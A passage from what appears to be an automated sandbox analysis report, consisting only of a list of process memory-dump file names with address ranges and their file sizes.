                                                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                                                        • memory/512-1-0x0000000073560000-0x0000000073C4E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                        • memory/512-5-0x00000000057B0000-0x0000000005826000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          472KB

                                                                                                                                                                                                                                        • memory/512-0-0x0000000000D30000-0x0000000000E20000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          960KB

                                                                                                                                                                                                                                        • memory/512-3-0x00000000031B0000-0x0000000003242000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          584KB

                                                                                                                                                                                                                                        • memory/516-282-0x0000000000D60000-0x0000000001248000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.9MB

                                                                                                                                                                                                                                        • memory/528-3398-0x0000000000400000-0x00000000008DF000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.9MB

                                                                                                                                                                                                                                        • memory/684-401-0x0000000004310000-0x0000000004320000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/684-418-0x0000000007B00000-0x0000000007B4B000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          300KB

                                                                                                                                                                                                                                        • memory/684-399-0x0000000004310000-0x0000000004320000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/684-398-0x0000000073560000-0x0000000073C4E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                        • memory/1860-407-0x0000000006D40000-0x0000000006D50000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/1860-405-0x0000000073560000-0x0000000073C4E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                        • memory/1860-467-0x0000000008340000-0x000000000837C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                                        • memory/1860-406-0x0000000006D40000-0x0000000006D50000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/2264-533-0x0000000010000000-0x0000000010569000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          5.4MB

                                                                                                                                                                                                                                        • memory/2324-256-0x0000000000850000-0x0000000000D38000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.9MB

                                                                                                                                                                                                                                        • memory/2388-354-0x0000000000400000-0x000000000071A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.1MB

                                                                                                                                                                                                                                        • memory/2388-334-0x0000000000890000-0x0000000000891000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/2404-3400-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/2404-3387-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/2432-380-0x00007FF711020000-0x00007FF7110D7000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          732KB

                                                                                                                                                                                                                                        • memory/2492-10-0x0000000000400000-0x0000000000408000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                        • memory/2492-223-0x0000000073560000-0x0000000073C4E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                        • memory/2492-249-0x0000000005220000-0x0000000005230000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/2492-12-0x0000000073560000-0x0000000073C4E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                        • memory/2492-13-0x0000000005220000-0x0000000005230000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/2928-1575-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/2928-1568-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/2928-2562-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/2928-1559-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/2928-2064-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/3260-297-0x0000000000D60000-0x0000000001248000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.9MB

                                                                                                                                                                                                                                        • memory/3844-400-0x00000000029C0000-0x0000000002DBD000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.0MB

                                                                                                                                                                                                                                        • memory/3844-137-0x00000000029C0000-0x0000000002DBD000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.0MB

                                                                                                                                                                                                                                        • memory/3844-1051-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/3844-139-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/3844-571-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/3844-404-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/3844-138-0x0000000002DC0000-0x00000000036AB000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8.9MB

                                                                                                                                                                                                                                        • memory/4212-239-0x0000000000D60000-0x0000000001248000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.9MB

                                                                                                                                                                                                                                        • memory/4544-292-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          864KB

                                                                                                                                                                                                                                        • memory/4544-276-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          864KB

                                                                                                                                                                                                                                        • memory/4544-359-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          864KB

                                                                                                                                                                                                                                        • memory/4576-3405-0x0000000000400000-0x00000000008DF000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.9MB

                                                                                                                                                                                                                                        • memory/4628-1057-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/4628-277-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/4628-261-0x0000000002E30000-0x000000000371B000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8.9MB

                                                                                                                                                                                                                                        • memory/4628-257-0x0000000002A30000-0x0000000002E2C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.0MB

                                                                                                                                                                                                                                        • memory/4628-897-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/4772-1576-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/4772-2578-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/4772-2066-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/4772-1569-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/4772-1561-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9.1MB

                                                                                                                                                                                                                                        • memory/4920-394-0x0000000073560000-0x0000000073C4E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                        • memory/4920-372-0x0000000006A10000-0x0000000006A18000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                        • memory/4920-382-0x0000000004550000-0x0000000004560000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/4920-364-0x0000000006A20000-0x0000000006A3A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                        • memory/4920-333-0x000000007ECB0000-0x000000007ECC0000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/4920-288-0x0000000004550000-0x0000000004560000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/4920-290-0x0000000004550000-0x0000000004560000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/4920-255-0x0000000073560000-0x0000000073C4E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                        • memory/4920-60-0x0000000009260000-0x00000000092F4000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          592KB

                                                                                                                                                                                                                                        • memory/4920-59-0x0000000004550000-0x0000000004560000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/4920-52-0x0000000070340000-0x000000007038B000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          300KB

                                                                                                                                                                                                                                        • memory/4920-58-0x0000000009040000-0x00000000090E5000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          660KB

                                                                                                                                                                                                                                        • memory/4920-53-0x0000000008CD0000-0x0000000008CEE000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                        • memory/4920-50-0x000000007ECB0000-0x000000007ECC0000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/4920-51-0x0000000008F10000-0x0000000008F43000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          204KB

                                                                                                                                                                                                                                        • memory/4920-27-0x0000000007B80000-0x0000000007BCB000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          300KB

                                                                                                                                                                                                                                        • memory/4920-26-0x0000000006F10000-0x0000000006F2C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          112KB

                                                                                                                                                                                                                                        • memory/4920-25-0x00000000077B0000-0x0000000007B00000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.3MB

                                                                                                                                                                                                                                        • memory/4920-24-0x0000000007570000-0x00000000075D6000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                        • memory/4920-18-0x0000000073560000-0x0000000073C4E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                        • memory/4920-19-0x0000000004550000-0x0000000004560000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/4920-23-0x0000000006E70000-0x0000000006ED6000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                        • memory/4920-22-0x0000000006C70000-0x0000000006C92000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                        • memory/4920-21-0x0000000004550000-0x0000000004560000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/4920-20-0x0000000006F40000-0x0000000007568000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6.2MB

                                                                                                                                                                                                                                        • memory/4920-17-0x0000000004300000-0x0000000004336000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          216KB